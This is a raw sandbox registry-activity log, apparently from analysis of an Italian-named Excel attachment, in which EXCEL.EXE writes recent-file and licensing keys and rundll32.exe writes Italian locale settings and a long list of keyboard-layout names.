000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
25
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
[F00000000][T01D50B025A376E80][O00000000]*C:\Users\admin\Desktop\
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Max Display
25
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\File MRU
Item 1
[F00000000][T01D50B025A376E80][O00000000]*C:\Users\admin\Desktop\2019_EmailCliente_0000065445_Allegato1_20190515061941.xls
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Licensing
538F6C892AD540068154C6670774E980
01000000270000007B39303134303030302D303033442D303030302D303030302D3030303030303046463143457D005A0000004F00660066006900630065002000310034002C0020004F0066006600690063006500500072006F00660065007300730069006F006E0061006C002D00520065007400610069006C002000650064006900740069006F006E000000
2088
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091793
2088
EXCEL.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1320091794
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTF
91
2088
EXCEL.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTA
91
3816
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409\{34745C63-B2F0-4784-8B67-5E12C8701A31}
3816
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000409
3816
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
3816
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5037
Romanian (Legacy)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5055
Russian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5030
Croatian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5039
Slovak
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5029
Albanian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5022
Swedish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5079
Thai Kedmanee
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5060
Turkish Q
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5129
Urdu
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5058
Ukrainian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5052
Belarusian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5041
Slovenian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5042
Estonian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5043
Latvian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5045
Lithuanian IBM
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5151
Tajik
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5124
Persian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5118
Vietnamese
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5120
Armenian Eastern
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5117
Azeri Latin
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5163
Sorbian Standard (Legacy)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5109
Macedonian (FYROM)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5191
Setswana
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5119
Georgian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5108
Faeroese
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5096
Devanagari - INSCRIPT
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5140
Maltese 47-Key
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5138
Norwegian with Sami
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5113
Kazakh
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5128
Kyrgyz Cyrillic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5150
Turkmen
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5116
Tatar
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5135
Bengali
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5101
Punjabi
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5097
Gujarati
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5100
Oriya
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5102
Tamil
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5103
Telugu
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5098
Kannada
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5139
Malayalam
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5177
Assamese - INSCRIPT
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5104
Marathi
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5127
Mongolian Cyrillic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5154
Tibetan (PRC)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5145
United Kingdom Extended
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5161
Khmer
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5162
Lao
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5130
Syriac
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5166
Sinhala
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5169
Nepali
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5159
Pashto (Afghanistan)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5132
Divehi Phonetic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5187
Hausa
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5189
Yoruba
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5186
Sesotho sa Leboa
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5148
Bashkir
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5168
Luxembourgish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5170
Greenlandic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5188
Igbo
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5165
Uyghur (Legacy)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5146
Maori
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5160
Yakut
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5190
Wolof
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5072
Chinese (Simplified) - US Keyboard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5024
Swiss German
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5025
United Kingdom
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5017
Latin American
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5002
Belgian French
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5001
Belgian (Period)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5019
Portuguese
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5038
Serbian (Latin)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5115
Azeri Cyrillic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5144
Swedish with Sami
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5114
Uzbek Cyrillic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5158
Mongolian (Mongolian Script)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5156
Inuktitut - Latin
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5192
Chinese (Traditional, Hong Kong S.A.R.) - US Keyboard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5005
Canadian French (Legacy)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5057
Serbian (Cyrillic)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5193
Chinese (Simplified, Singapore) - US Keyboard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5004
Canadian French
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5023
Swiss French
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5194
Chinese (Traditional, Macao S.A.R.) - US Keyboard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5014
Irish
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5155
Bosnian (Cyrillic)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5085
Arabic (102)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5054
Bulgarian (Latin)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5032
Czech (QWERTY)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5012
German (IBM)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5048
Greek (220)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5092
United States-Dvorak
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5021
Spanish Variation
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5034
Hungarian 101-key
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5016
Italian (142)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5036
Polish (214)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5126
Portuguese (Brazilian ABNT2)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5175
Romanian (Standard)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5056
Russian (Typewriter)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5040
Slovak (QWERTY)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5080
Thai Pattachote
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5059
Turkish F
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5044
Latvian (QWERTY)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5088
Lithuanian
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5121
Armenian Western
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5164
Sorbian Extended
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5174
Macedonian (FYROM) - Standard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5182
Georgian (QWERTY)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5105
Hindi Traditional
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5141
Maltese 48-Key
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5143
Sami Extended Norway
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5136
Bengali - INSCRIPT (Legacy)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5131
Syriac Phonetic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5167
Sinhala - Wij 9
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5171
Inuktitut - Naqittaut
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5133
Divehi Typewriter
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5185
Uyghur
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5089
Belgian (Comma)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5137
Finnish with Sami
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5110
Canadian Multilingual Standard
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5125
Gaelic
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5086
Arabic (102) AZERTY
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5173
Bulgarian (Phonetic)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5087
Czech Programmers
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5049
Greek (319)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5026
United States-International
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5176
Romanian (Programmers)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5081
Thai Kedmanee (non-ShiftLock)
3816
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5179
Ukrainian (Enhanced)
3816
rundll32.exe
write
